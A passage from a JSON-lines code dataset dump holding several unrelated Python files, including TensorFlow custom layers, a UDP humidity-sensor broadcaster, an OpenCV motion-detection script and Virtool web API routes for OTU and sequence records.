tf.linalg.diag_part(dis)\n inter_mean = []\n for m in range(self.output_dim):\n sub = self.kernel - self.kernel[m]\n inter = tf.linalg.diag_part(tf.matmul(sub @ self.T, sub, transpose_b=True))\n inter_m = tf.concat([inter[:m], inter[m + 1:]], axis=0)\n inter_m = inter_m[tf.math.argmin(inter_m)]\n inter_mean.append(inter_m)\n # inter_mean.append(tf.reduce_mean(inter_m * params))\n inter_mean = tf.reshape(inter_mean, shape=[1, -1])\n params = tf.math.softmax(-1 * inter_mean)\n inter_diff = tf.tile(tf.reshape(tf.reduce_mean(inter_mean * params), shape=[1, 1]), multiples=[batch_size, 1])\n return tf.concat([out, inter_diff], axis=1)\n\n def compute_output_shape(self, input_shape):\n shape = tf.TensorShape((input_shape[0], self.output_dim + 1))\n return shape\n\n\nclass Arc_Logit(keras.layers.Layer):\n def __init__(self, output_dim, m, **kwargs):\n self.output_dim = output_dim\n self.m = m\n super(Arc_Logit, self).__init__(**kwargs)\n\n def build(self, input_shape):\n kernel_shape = tf.TensorShape((input_shape[1], self.output_dim))\n self.kernel = self.add_weight(name='kernel',\n shape=kernel_shape,\n initializer=tf.initializers.random_normal,\n trainable=True)\n self.scale = self.add_weight(name='scale',\n shape=(),\n initializer=tf.initializers.zeros,\n regularizer=keras.regularizers.l2(5.),\n trainable=True)\n self.margin = self.add_weight(name='margin',\n shape=(),\n initializer=tf.initializers.zeros,\n # regularizer=keras.regularizers.l2(5.),\n trainable=True)\n super(Arc_Logit, self).build(input_shape)\n\n def call(self, inputs, *args, **kwargs):\n kernels = tf.math.l2_normalize(self.kernel, axis=0, epsilon=1e-9)\n features = tf.math.l2_normalize(inputs, axis=1, epsilon=1e-9)\n logits1 = 3.1 * tf.matmul(features, kernels)\n theta = tf.math.acos(logits1)\n theta_m = theta + self.margin\n logits2 = 3.1 * tf.math.cos(theta_m)\n logits = tf.concat([logits1, logits2], axis=1)\n return logits\n\n def compute_output_shape(self, input_shape):\n shape = tf.TensorShape((input_shape[0], self.output_dim * 2))\n return shape\n\n\nclass Dense_regu(keras.layers.Layer):\n def __init__(self, output_dim, **kwargs):\n self.output_dim = output_dim\n super(Dense_regu, self).__init__(**kwargs)\n\n def build(self, input_shape):\n shape = tf.TensorShape((input_shape[1], self.output_dim))\n self.kernel = self.add_weight(name='kernel',\n shape=shape,\n initializer=keras.initializers.random_normal,\n trainable=True)\n super(Dense_regu, self).build(input_shape)\n\n def call(self, inputs, *args, **kwargs):\n T_mode = tf.reshape(tf.reduce_sum(tf.square(self.kernel), axis=0), shape=[1, -1])\n T = self.kernel / tf.sqrt(T_mode)\n feature_mode = tf.reshape(tf.reduce_sum(tf.square(inputs), axis=0), shape=[1, -1])\n feature = inputs / tf.sqrt(feature_mode)\n logits = tf.matmul(feature, T)\n inner_mul = tf.matmul(T, T, transpose_a=True)\n up_tri = tf.linalg.band_part(tf.zeros(shape=[self.output_dim, self.output_dim]),\n num_lower=0, num_upper=-1)\n inner_ang = tf.boolean_mask(inner_mul, up_tri)\n params = tf.math.softmax(-1 * inner_ang)\n inter_diff = tf.tile(tf.reshape(tf.reduce_mean(inner_ang * params), shape=[1, 1]),\n multiples=[tf.shape(inputs)[0], 1])\n return tf.concat([logits, inter_diff], axis=1)\n\n def compute_output_shape(self, input_shape):\n shape = tf.TensorShape((input_shape[0], self.output_dim + 1))\n return shape\n","sub_path":"models/custom_layers.py","file_name":"custom_layers.py","file_ext":"py","file_size_in_byte":10986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"231854117","text":"\"\"\"\n Write a method to return all subsets of a set\n O(n.2**n)\n\"\"\"\n\ndef getAllSets(S):\n S = list(S)\n n = len(S)\n subsets = []\n for i in range(1 << n):\n subset = []\n for j in range(n):\n if i & (1 << j):\n subset.append(S[j])\n subsets.append(subset)\n assert len(subsets) == 2**n\n return subsets\n\nif __name__ == \"__main__\":\n S = set([1, 2, 3])\n print(getAllSets(S))","sub_path":"Chapter08/08_04_PowerSet_NaiveBinary.py","file_name":"08_04_PowerSet_NaiveBinary.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"367585586","text":"from connection import *\nimport connection, threading, socket\nfrom datetime import datetime\n\nvalue = -1\n\nhumidityTimes = {}\n\nwith open(SOURCE_FILE, mode='r+') as csv_file:\n for row in csv_file:\n if (row.split(',')[3] == '\\n'):\n humidityTimes[row.split(',')[1]] = 'error'\n continue\n humidityTimes[row.split(',')[1]] = row.split(',')[3]\n\n\ndef parseTemp(text):\n res = \"\"\n for i in text:\n if i.isnumeric() or i == '.' or i == '-':\n res += i\n return float(res)\n\n\ndef findInitialValue():\n global value\n foundFirst = False\n initialTime = datetime.strptime(datetime.now().strftime(\"%#H:%M:%S\"),\n \"%H:%M:%S\")\n for time in humidityTimes:\n if humidityTimes[time] != \"error\":\n temp = datetime.strptime(time, \"%H:%M:%S\")\n if foundFirst:\n if (temp > initialTime):\n break\n else:\n value = parseTemp(humidityTimes[time])\n else:\n if temp < initialTime:\n foundFirst = True\n\n\ndef getValue():\n global value\n while (True):\n try:\n time = datetime.now().strftime(\"%#H:%M:%S\")\n newValue = humidityTimes[time]\n if newValue != \"error\":\n value = parseTemp(newValue)\n except:\n pass\n sleep(1)\n\n\ndef sendData():\n global i\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n while True:\n if connection.CONNECTED:\n if value != -1:\n sock.sendto(\n bytes(\n \"{\\\"SN\\\": \\\"\" + SERIAL_NUMBER + \"\\\",\\\"nickname\\\":\\\"\" +\n connection.NICKNAME +\n \"\\\",\\\"measure\\\": \\\"HUM\\\", \\\"value\\\":\" + str(value) +\n \"}\", \"utf-8\"), (\"255.255.255.255\", 5005))\n print(\"{\\\"SN\\\": \\\"\" + SERIAL_NUMBER +\n \"\\\",\\\"measure\\\": \\\"HUM\\\", \\\"value\\\":\" + str(value) + \"}\")\n sleep(5)\n\n\nfindInitialValue()\n\ncheckConnection = threading.Thread(target=waitForConnection)\nsender = threading.Thread(target=sendData)\ngetData = threading.Thread(target=getValue)\n\ngetData.start()\ncheckConnection.start()\nsender.start()\n\nwhile True:\n sleep(1)\n","sub_path":"insideSensors/humidity-sensor.py","file_name":"humidity-sensor.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"483313166","text":"\"\"\"\nutils\n\"\"\"\nimport torch\nimport torchvision.datasets as dsets\nimport torchvision.transforms as transforms\n\ntransform = transforms.Compose([\n transforms.Resize(128),\n transforms.ToTensor(),\n])\n\n\ndef load_data_stl10(batch_size=64, test=False):\n if not test:\n train_dset = dsets.STL10(root='./data', split='train', transform=transform, download=True)\n else:\n train_dset = dsets.STL10(root='./data', split='test', transform=transform, download=True)\n train_loader = torch.utils.data.DataLoader(train_dset, batch_size=batch_size, shuffle=True)\n print(\"LOAD DATA, %d\" % (len(train_loader)))\n return train_loader\n\ndef load_data_cifar(batch_size=64):\n train_dset = dsets.CIFAR10(root='./data', train=True, transform=transform, download=True)\n train_loader = torch.utils.data.DataLoader(train_dset, batch_size=batch_size, shuffle=True)\n print(\"LOAD DATA, %d\" % len(train_loader))\n return train_loader\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"298822277","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 22 09:44:47 2020\n\n@author: Akash Kaushik\n\"\"\"\n\ndef user_input():\n \n number = \"wrong\"\n \n while number.isdigit() == False:\n number = input(\"Enter the Natural Number:\")\n \n return int(number)\n\nnum = user_input()\n\ndef sum_natural(num):\n sum1 = 0\n for i in range(1, num+1):\n a = i*i\n sum1 = sum1 + a\n \n return sum1\n\nb = sum_natural(num)\n\nprint(\"Sum of \", num, \"natural number is\", b)","sub_path":"Python Program for Sum of squares of first n natural numbers.py","file_name":"Python Program for Sum of squares of first n natural numbers.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"301936826","text":"import sys\nimport os\nfrom zipfile import ZipFile\nimport shutil\n\n\ndef unzip(file_path):\n myzip = ZipFile(file_path)\n for name in myzip.namelist():\n filename = name.encode('cp437').decode('gbk')\n myzip.extract(name)\n #os.chdir(file_path)\n try:\n os.rename(name, filename)\n\n except FileExistsError:\n os.remove(filename)\n os.rename(name, filename)\n\n\ndef copy_all(source, destination):\n z1 = destination\n\n for root, dir1, files1 in os.walk(source):\n for o1 in dir1:\n full_dirs = os.path.join(root, o1)\n relative_paths = full_dirs.replace(source, '')\n current_dirs = z1 + relative_paths\n try:\n os.makedirs(current_dirs)\n except FileExistsError:\n pass\n\n now_dirs = z1 + root.replace(source, '')\n for t0 in files1:\n shutil.copy(os.path.join(root, t0), now_dirs + '/' + t0)\n\n\ndef write_pythonpath(dir_path):\n dirs = [x for x in sys.path if x.endswith('site-packages')]\n if os.path.exists(dirs[0]+'/a.pth'):\n pass\n else:\n print('正在解压依赖包')\n unzip('site-packages.zip')\n print('正在复制依赖包')\n copy_all('site-packages', dirs[0])\n from testing_remove_line import change_line_py\n jc = dirs[0].replace('\\\\','\\\\\\\\')\n change_line_py(dirs[0]+'/ffmpy3.py', 52, ' def __init__(self, executable=\\''+jc + '\\\\\\\\ffmpeg.exe\\', global_options=None, inputs=None, outputs=None):\\n')\n with open(dirs[0]+'/a.pth', 'w', encoding='utf-8') as f:\n\n f.write(dir_path+'bilibili/\\n')\n f.write(dir_path+'bilibili/bilibili/spiders/\\n')\n","sub_path":"pythonfromroot/refer2.py","file_name":"refer2.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"340015456","text":"#!/usr/bin/env python\n# import requests\nimport re, sys\nimport pandas as pd\n\n\n\nif __name__ == '__main__':\n\n f = open('raw_target_data_url.txt', 'r')\n raw_data = f.read()\n f.close()\n data_rows = raw_data.split('\\n')\n\n #file_label, species_label, audio_id, url\n #make a list of dictionaries with those keys and turn into a dataframe then csv it to file\n df_list = []\n counter = len(data_rows)\n\n count = 0\n while (count= width:\n x = width - half - 1\n\n if x < half:\n x = half\n\n if y + half >= height:\n y = height - half - 1\n\n if y < half:\n y = half\n\n return img[y - half : y + half + 1, x - half : x + half + 1]\n\n# Implement the search algorithm called three step search, used to find the similar block among two frames\ndef ThreeStepSearch(currentSub, previous, center, S, blocksize):\n\n if S < 1:\n return center\n\n itself = (int(center[0]), int(center[1]))\n itselfSubimg = getSubImage(previous, itself, blocksize)\n\n top = (int(center[0]- S), int(center[1]))\n topsubimg = getSubImage(previous, top, blocksize)\n\n bottom = (int(center[0] + S), int(center[1]))\n b_subimg = getSubImage(previous, bottom, blocksize)\n\n left = (int(center[0]), int(center[1] - S))\n l_subimg = getSubImage(previous, left, blocksize)\n\n right = (int(center[0]), int(center[1] + S))\n r_subimg = getSubImage(previous, right, blocksize)\n\n topleft = (int(center[0] - S), int(center[1] - S))\n tl_subimg = getSubImage(previous, topleft, blocksize)\n\n topright = (int(center[0] - S), int(center[1] + S))\n tr_subimg = getSubImage(previous, topright, blocksize)\n\n bottomleft = (int(center[0] + S), int(center[1] - S))\n bl_subimg = getSubImage(previous, bottomleft, blocksize)\n\n bottomright = (int(center[0] + S), int(center[1] + S))\n br_subimg = getSubImage(previous, bottomright, blocksize)\n\n rIt = MAD(currentsunImg, itselfSubimg)\n\n rTop = MAD(currentSub, topsubimg)\n\n rBot = MAD(currentSub, b_subimg)\n\n rL = MAD(currentSub, l_subimg)\n\n rR = MAD(currentSub, r_subimg)\n\n rTL = MAD(currentSub, tl_subimg)\n\n rTR = MAD(currentSub, tr_subimg)\n\n rBL = MAD(currentSub, bl_subimg)\n\n rBR = MAD(currentSub, br_subimg)\n\n sequence = (itself, top, bottom, left, right, topleft, topright, bottomleft, bottomright)\n\n result = (rIt, rTop, rBot, rL, rR, rTL, rTR, rBL, rBR)\n\n idx = result.index(min(result))\n\n center = sequence[idx]\n\n S = S / 2\n\n return ThreeStepSearch(currentSub, previous, center, S, blocksize)\n\n# Another search method by going through each block that is within a limited radius\n# Below the radius is 6\ndef neighborblock(currentSub, previous, center,block_size):\n\n min_center = None\n min_dis = 10000\n\n for y in range (-3,4):\n for x in range(-3,4):\n temp_center = (center[0] + y, center[1] + x)\n\n tempSub = getSubImage(previous, temp_center, block_size)\n\n temp_val = MAD(currentSub, tempSub)\n\n if (temp_val < min_dis):\n min_dis = temp_val\n min_center = temp_center\n\n return min_center, min_dis\n\n\n# Extract each frame of the video and store in the folder, for the further comparasion\n\ncount = 0\n\nwhile(1):\n ret, frame = cap.read()\n\n if not ret:\n print(\"Video reached end\")\n break;\n\n\n cv2.imwrite(\"img/frame%d.tif\" % count, frame)\n\n cv2.imshow(\"Monkey Frame\", frame)\n\n count = count + 1\n\n if cv2.waitKey(30) & 0xff == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()\n\n\ncount_pre = 0\ncount_cur = 1\n\n# Get the previous and current frame and store the modified frame into a folder\n\nwhile (1):\n\n previous = cv2.imread(\"img/frame%d.tif\" % count_pre)\n\n current = cv2.imread(\"img/frame%d.tif\" % count_cur)\n\n modify = np.copy(current)\n\n if previous is None:\n print(\"Previous Frame is not found\")\n break\n\n if current is None:\n print(\"Current Frame is not found\")\n break\n\n for y in range (0, frame_height, block_size):\n for x in range (0, frame_width, block_size):\n\n center = (y + int(block_size/2), x + int(block_size/2))\n\n currentsunImg = getSubImage(current, center, block_size)\n\n # Using Search radius block Search algorithm\n # displacement_center, difference = neighborblock(currentsunImg, previous, center, block_size)\n\n # Three Step Search algorithm\n displacement_center = ThreeStepSearch(currentsunImg, previous, center, 4, block_size)\n\n displacementImg = getSubImage(previous, displacement_center, block_size)\n\n difference = MAD(currentsunImg, displacementImg)\n\n if difference > 60:\n modify[center[0], center[1]] = [255, 255, 255]\n\n\n # used to add the boundary to the object that moves most.\n\n kernel = np.ones((10, 10), np.uint8)\n\n dilation = cv2.dilate(modify, kernel, iterations = 3)\n\n closing = cv2.morphologyEx(dilation, cv2.MORPH_CLOSE, kernel)\n\n closing = cv2.cvtColor(closing, cv2.COLOR_BGR2GRAY)\n\n ret, binary = cv2.threshold(closing, 240, 255, cv2.THRESH_BINARY)\n\n\n im_back, countours, hierarchy = cv2.findContours(binary, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n cv2.drawContours(modify, countours, -1, (255, 255, 255), 1)\n\n cv2.imshow(\"Modify\", modify)\n\n print(\"Center: \", center[0], \" x \", center[1])\n print(\"Difference\", difference)\n\n cv2.imwrite(\"boundary/frame%d.tif\" % count_pre, modify)\n\n count_pre = count_pre + 1\n\n count_cur = count_cur + 1\n\n if cv2.waitKey(30) & 0xff == ord('q'):\n break\n\n# Output the video based on the frame that stored previously.\nmaker = 0\nout = cv2.VideoWriter('Boudary_demo.avi', cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), 10, (int(frame_width), int(frame_height)))\nwhile(1):\n img = cv2.imread('boundary/frame%d.tif' % maker)\n if img is None:\n break;\n\n out.write(img)\n maker = maker + 1\nout.release()\ncv2.destroyAllWindows()\n\n\n\n\n","sub_path":"motion-detection/LabSubmission.py","file_name":"LabSubmission.py","file_ext":"py","file_size_in_byte":7616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"59084659","text":"import asyncio\n\nfrom aiohttp import web\n\nimport virtool.db.utils\nimport virtool.history.db\nimport virtool.history.utils\nimport virtool.http.routes\nimport virtool.otus.db\nimport virtool.otus.isolates\nimport virtool.otus.sequences\nimport virtool.otus.utils\nimport virtool.references.db\nimport virtool.references.utils\nimport virtool.utils\nimport virtool.validators\nfrom virtool.api.response import bad_request, insufficient_rights, json_response, no_content, not_found\n\nSCHEMA_VALIDATOR = {\n \"type\": \"list\",\n \"validator\": virtool.validators.has_unique_segment_names,\n \"schema\": {\n \"type\": \"dict\",\n \"allow_unknown\": False,\n \"schema\": {\n \"name\": {\"type\": \"string\", \"required\": True},\n \"required\": {\"type\": \"boolean\", \"default\": True},\n \"molecule\": {\"type\": \"string\", \"default\": \"\", \"allowed\": [\n \"\",\n \"ssDNA\",\n \"dsDNA\",\n \"ssRNA\",\n \"ssRNA+\",\n \"ssRNA-\",\n \"dsRNA\"\n ]}\n }\n }\n}\n\nroutes = virtool.http.routes.Routes()\n\n\n@routes.get(\"/api/otus\")\nasync def find(req):\n \"\"\"\n Find otus.\n\n \"\"\"\n db = req.app[\"db\"]\n\n term = req[\"query\"].get(\"find\")\n verified = req[\"query\"].get(\"verified\")\n names = req[\"query\"].get(\"names\", False)\n\n data = await virtool.otus.db.find(\n db,\n names,\n term,\n req[\"query\"],\n verified\n )\n\n return json_response(data)\n\n\n@routes.get(\"/api/otus/{otu_id}\")\nasync def get(req):\n \"\"\"\n Get a complete otu document. Joins the otu document with its associated sequence documents.\n\n \"\"\"\n db = req.app[\"db\"]\n\n otu_id = req.match_info[\"otu_id\"]\n\n complete = await virtool.otus.db.join_and_format(db, otu_id)\n\n if not complete:\n return not_found()\n\n return json_response(complete)\n\n\n@routes.post(\"/api/refs/{ref_id}/otus\", schema={\n \"name\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n \"empty\": False,\n \"required\": True\n },\n \"abbreviation\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n \"default\": \"\"\n },\n \"schema\": SCHEMA_VALIDATOR\n})\nasync def create(req):\n \"\"\"\n Add a new otu to the collection. Checks to make sure the supplied otu name and abbreviation are not already in\n use in the collection. Any errors are sent back to the client.\n\n \"\"\"\n db = req.app[\"db\"]\n data = req[\"data\"]\n\n ref_id = req.match_info[\"ref_id\"]\n\n reference = await db.references.find_one(ref_id, [\"groups\", \"users\"])\n\n if reference is None:\n return not_found()\n\n if not await virtool.references.db.check_right(req, reference, \"modify_otu\"):\n return insufficient_rights()\n\n name = data[\"name\"].strip()\n abbreviation = data[\"abbreviation\"].strip()\n\n # Check if either the name or abbreviation are already in use. Send a ``400`` if they are.\n message = await virtool.otus.db.check_name_and_abbreviation(db, ref_id, name, abbreviation)\n\n if message:\n return bad_request(message)\n\n document = await asyncio.shield(virtool.otus.db.create(\n req.app,\n ref_id,\n name,\n abbreviation,\n req[\"client\"].user_id\n ))\n\n headers = {\n \"Location\": \"/api/otus/\" + document[\"id\"]\n }\n\n return json_response(document, status=201, headers=headers)\n\n\n@routes.patch(\"/api/otus/{otu_id}\", schema={\n \"name\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n \"empty\": False\n },\n \"abbreviation\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip\n },\n \"schema\": SCHEMA_VALIDATOR\n})\nasync def edit(req):\n \"\"\"\n Edit an existing OTU. Checks to make sure the supplied OTU name and abbreviation are not already in use in\n the collection.\n\n \"\"\"\n db = req.app[\"db\"]\n data = req[\"data\"]\n\n otu_id = req.match_info[\"otu_id\"]\n\n # Get existing complete otu record, at the same time ensuring it exists. Send a ``404`` if not.\n document = await db.otus.find_one(otu_id, [\"abbreviation\", \"name\", \"reference\", \"schema\"])\n\n if not document:\n return not_found()\n\n ref_id = document[\"reference\"][\"id\"]\n\n if not await virtool.references.db.check_right(req, ref_id, \"modify_otu\"):\n return insufficient_rights()\n\n name, abbreviation, schema = virtool.otus.utils.evaluate_changes(data, document)\n\n # Send ``200`` with the existing otu record if no change will be made.\n if name is None and abbreviation is None and schema is None:\n return json_response(await virtool.otus.db.join_and_format(db, otu_id))\n\n # Make sure new name or abbreviation are not already in use.\n message = await virtool.otus.db.check_name_and_abbreviation(db, ref_id, name, abbreviation)\n\n if message:\n return bad_request(message)\n\n document = await asyncio.shield(virtool.otus.db.edit(\n req.app,\n otu_id,\n name,\n abbreviation,\n schema,\n req[\"client\"].user_id\n ))\n\n return json_response(document)\n\n\n@routes.delete(\"/api/otus/{otu_id}\")\nasync def remove(req):\n \"\"\"\n Remove an OTU document and its associated sequence documents.\n\n \"\"\"\n db = req.app[\"db\"]\n\n otu_id = req.match_info[\"otu_id\"]\n\n document = await db.otus.find_one(otu_id, [\"reference\"])\n\n if document is None:\n return not_found()\n\n if not await virtool.references.db.check_right(req, document[\"reference\"][\"id\"], \"modify_otu\"):\n return insufficient_rights()\n\n await asyncio.shield(virtool.otus.db.remove(\n req.app,\n otu_id,\n req[\"client\"].user_id\n ))\n\n return web.Response(status=204)\n\n\n@routes.get(\"/api/otus/{otu_id}/isolates\")\nasync def list_isolates(req):\n \"\"\"\n Return a list of isolate records for a given otu.\n\n \"\"\"\n db = req.app[\"db\"]\n\n otu_id = req.match_info[\"otu_id\"]\n\n document = await virtool.otus.db.join_and_format(db, otu_id)\n\n if not document:\n return not_found()\n\n return json_response(document[\"isolates\"])\n\n\n@routes.get(\"/api/otus/{otu_id}/isolates/{isolate_id}\")\nasync def get_isolate(req):\n \"\"\"\n Get a complete specific isolate sub-document, including its sequences.\n\n \"\"\"\n db = req.app[\"db\"]\n\n otu_id = req.match_info[\"otu_id\"]\n isolate_id = req.match_info[\"isolate_id\"]\n\n document = await db.otus.find_one({\"_id\": otu_id, \"isolates.id\": isolate_id}, [\"isolates\"])\n\n if not document:\n return not_found()\n\n isolate = dict(virtool.otus.utils.find_isolate(document[\"isolates\"], isolate_id), sequences=[])\n\n cursor = db.sequences.find({\"otu_id\": otu_id, \"isolate_id\": isolate_id}, {\"otu_id\": False, \"isolate_id\": False})\n\n async for sequence in cursor:\n sequence[\"id\"] = sequence.pop(\"_id\")\n isolate[\"sequences\"].append(sequence)\n\n return json_response(isolate)\n\n\n@routes.post(\"/api/otus/{otu_id}/isolates\", schema={\n \"source_type\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n \"default\": \"\"\n },\n \"source_name\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n \"default\": \"\"\n },\n \"default\": {\n \"type\": \"boolean\",\n \"default\": False\n }\n})\nasync def add_isolate(req):\n \"\"\"\n Add a new isolate to a otu.\n\n \"\"\"\n db = req.app[\"db\"]\n data = req[\"data\"]\n\n otu_id = req.match_info[\"otu_id\"]\n\n document = await db.otus.find_one(otu_id, [\"reference\"])\n\n if not document:\n return not_found()\n\n if not await virtool.references.db.check_right(req, document[\"reference\"][\"id\"], \"modify_otu\"):\n return insufficient_rights()\n\n # All source types are stored in lower case.\n data[\"source_type\"] = data[\"source_type\"].lower()\n\n if not await virtool.references.db.check_source_type(db, document[\"reference\"][\"id\"], data[\"source_type\"]):\n return bad_request(\"Source type is not allowed\")\n\n isolate = await asyncio.shield(virtool.otus.isolates.add(\n req.app,\n otu_id,\n data,\n req[\"client\"].user_id\n ))\n\n headers = {\n \"Location\": f\"/api/otus/{otu_id}/isolates/{isolate['id']}\"\n }\n\n return json_response(\n isolate,\n status=201,\n headers=headers\n )\n\n\n@routes.patch(\"/api/otus/{otu_id}/isolates/{isolate_id}\", schema={\n \"source_type\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n },\n \"source_name\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n }\n})\nasync def edit_isolate(req):\n \"\"\"\n Edit an existing isolate.\n\n \"\"\"\n db = req.app[\"db\"]\n data = req[\"data\"]\n\n otu_id = req.match_info[\"otu_id\"]\n isolate_id = req.match_info[\"isolate_id\"]\n\n document = await db.otus.find_one({\"_id\": otu_id, \"isolates.id\": isolate_id})\n\n if not document:\n return not_found()\n\n ref_id = document[\"reference\"][\"id\"]\n\n if not await virtool.references.db.check_right(req, ref_id, \"modify_otu\"):\n return insufficient_rights()\n\n # All source types are stored in lower case.\n if \"source_type\" in data:\n data[\"source_type\"] = data[\"source_type\"].lower()\n\n if not await virtool.references.db.check_source_type(db, ref_id, data[\"source_type\"]):\n return bad_request(\"Source type is not allowed\")\n\n isolate = await asyncio.shield(virtool.otus.isolates.edit(\n req.app,\n otu_id,\n isolate_id,\n data,\n req[\"client\"].user_id\n ))\n\n return json_response(isolate, status=200)\n\n\n@routes.put(\"/api/otus/{otu_id}/isolates/{isolate_id}/default\")\nasync def set_as_default(req):\n \"\"\"\n Set an isolate as default.\n\n \"\"\"\n db = req.app[\"db\"]\n\n otu_id = req.match_info[\"otu_id\"]\n isolate_id = req.match_info[\"isolate_id\"]\n\n document = await db.otus.find_one({\"_id\": otu_id, \"isolates.id\": isolate_id}, [\"reference\"])\n\n if not document:\n return not_found()\n\n if not await virtool.references.db.check_right(req, document[\"reference\"][\"id\"], \"modify_otu\"):\n return insufficient_rights()\n\n isolate = await asyncio.shield(virtool.otus.isolates.set_default(\n req.app,\n otu_id,\n isolate_id,\n req[\"client\"].user_id\n ))\n\n return json_response(isolate)\n\n\n@routes.delete(\"/api/otus/{otu_id}/isolates/{isolate_id}\")\nasync def remove_isolate(req):\n \"\"\"\n Remove an isolate and its sequences from a otu.\n\n \"\"\"\n db = req.app[\"db\"]\n\n otu_id = req.match_info[\"otu_id\"]\n isolate_id = req.match_info[\"isolate_id\"]\n\n document = await db.otus.find_one({\"_id\": otu_id, \"isolates.id\": isolate_id}, [\"reference\"])\n\n if not document:\n return not_found()\n\n if not await virtool.references.db.check_right(req, document[\"reference\"][\"id\"], \"modify_otu\"):\n return insufficient_rights()\n\n await asyncio.shield(virtool.otus.isolates.remove(\n req.app,\n otu_id,\n isolate_id,\n req[\"client\"].user_id\n ))\n\n return no_content()\n\n\n@routes.get(\"/api/otus/{otu_id}/isolates/{isolate_id}/sequences\")\nasync def list_sequences(req):\n db = req.app[\"db\"]\n\n otu_id = req.match_info[\"otu_id\"]\n isolate_id = req.match_info[\"isolate_id\"]\n\n if not await db.otus.count_documents({\"_id\": otu_id, \"isolates.id\": isolate_id}):\n return not_found()\n\n projection = list(virtool.otus.db.SEQUENCE_PROJECTION)\n\n projection.remove(\"otu_id\")\n projection.remove(\"isolate_id\")\n\n cursor = db.sequences.find({\"otu_id\": otu_id, \"isolate_id\": isolate_id}, projection)\n\n return json_response([virtool.utils.base_processor(d) async for d in cursor])\n\n\n@routes.get(\"/api/otus/{otu_id}/isolates/{isolate_id}/sequences/{sequence_id}\")\nasync def get_sequence(req):\n \"\"\"\n Get a single sequence document by its ``accession`.\n\n \"\"\"\n db = req.app[\"db\"]\n\n otu_id = req.match_info[\"otu_id\"]\n isolate_id = req.match_info[\"isolate_id\"]\n sequence_id = req.match_info[\"sequence_id\"]\n\n sequence = await virtool.otus.sequences.get(\n db,\n otu_id,\n isolate_id,\n sequence_id\n )\n\n if sequence is None:\n return not_found()\n\n return json_response(sequence)\n\n\n@routes.post(\"/api/otus/{otu_id}/isolates/{isolate_id}/sequences\", schema={\n \"accession\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n \"empty\": False,\n \"required\": True\n },\n \"definition\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n \"empty\": False,\n \"required\": True\n },\n \"host\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n },\n \"segment\": {\n \"type\": \"string\",\n },\n \"sequence\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n \"empty\": False,\n \"required\": True\n },\n \"target\": {\n \"type\": \"string\"\n }\n})\nasync def create_sequence(req):\n \"\"\"\n Create a new sequence record for the given isolate.\n\n \"\"\"\n db = req.app[\"db\"]\n data = req[\"data\"]\n\n otu_id = req.match_info[\"otu_id\"]\n isolate_id = req.match_info[\"isolate_id\"]\n\n # Get the subject otu document. Will be ``None`` if it doesn't exist. This will result in a ``404`` response.\n document = await db.otus.find_one({\"_id\": otu_id, \"isolates.id\": isolate_id}, [\"reference\", \"schema\"])\n\n if not document:\n return not_found()\n\n ref_id = document[\"reference\"][\"id\"]\n\n if not await virtool.references.db.check_right(req, ref_id, \"modify_otu\"):\n return insufficient_rights()\n\n message = await virtool.otus.sequences.check_segment_or_target(\n db,\n otu_id,\n isolate_id,\n None,\n ref_id,\n data\n )\n\n if message:\n return bad_request(message)\n\n sequence_document = await asyncio.shield(virtool.otus.sequences.create(\n req.app,\n ref_id,\n otu_id,\n isolate_id,\n data,\n req[\"client\"].user_id\n ))\n\n headers = {\n \"Location\": f\"/api/otus/{otu_id}/isolates/{isolate_id}/sequences/{sequence_document['id']}\"\n }\n\n return json_response(sequence_document, status=201, headers=headers)\n\n\n@routes.patch(\"/api/otus/{otu_id}/isolates/{isolate_id}/sequences/{sequence_id}\", schema={\n \"accession\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n \"empty\": False\n },\n \"host\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip\n },\n \"definition\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n \"empty\": False\n },\n \"segment\": {\n \"type\": \"string\"\n },\n \"sequence\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n \"empty\": False\n },\n \"target\": {\n \"type\": \"string\"\n }\n})\nasync def edit_sequence(req):\n db = req.app[\"db\"]\n data = req[\"data\"]\n\n otu_id = req.match_info[\"otu_id\"]\n isolate_id = req.match_info[\"isolate_id\"]\n sequence_id = req.match_info[\"sequence_id\"]\n\n document = await db.otus.find_one({\"_id\": otu_id, \"isolates.id\": isolate_id}, [\"reference\", 